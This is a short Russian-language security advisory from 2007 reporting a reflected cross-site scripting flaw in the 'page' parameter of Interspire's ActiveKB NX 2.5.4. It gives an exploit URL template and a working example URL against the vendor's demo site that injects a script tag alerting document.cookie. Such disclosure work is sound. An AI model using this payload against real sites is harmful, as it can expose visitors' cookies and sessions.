XXS в ActiveKB NX 2.5.4

Здравствуйте, 3APA3A.

Software: ActiveKB NX 2.5.4
Vendor: www.interspire.com
Vulnerability: XXS
Risk: низкий
Date: 1.09.2007
discovered by durito [damagelab] -durito[at]mail[dot]ru-
HTTP: durito.narod.ru

+~~~:| Details |:

Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы.

+~~~:| Экплойт |:

http://www.target.com/activekb/ActiveKB/?page=[XXS]

+~~~:| Пример |:

http://www.interspire.com/activekb/demo/default/categories/ActiveKB/?page=%3Cscript%3Ealert(document.cookie);%3C/script%3E

–
С уважением,
durito [NGH Group] mailto:[email protected]
http://durito.narod.ru
http://ngh.void.ru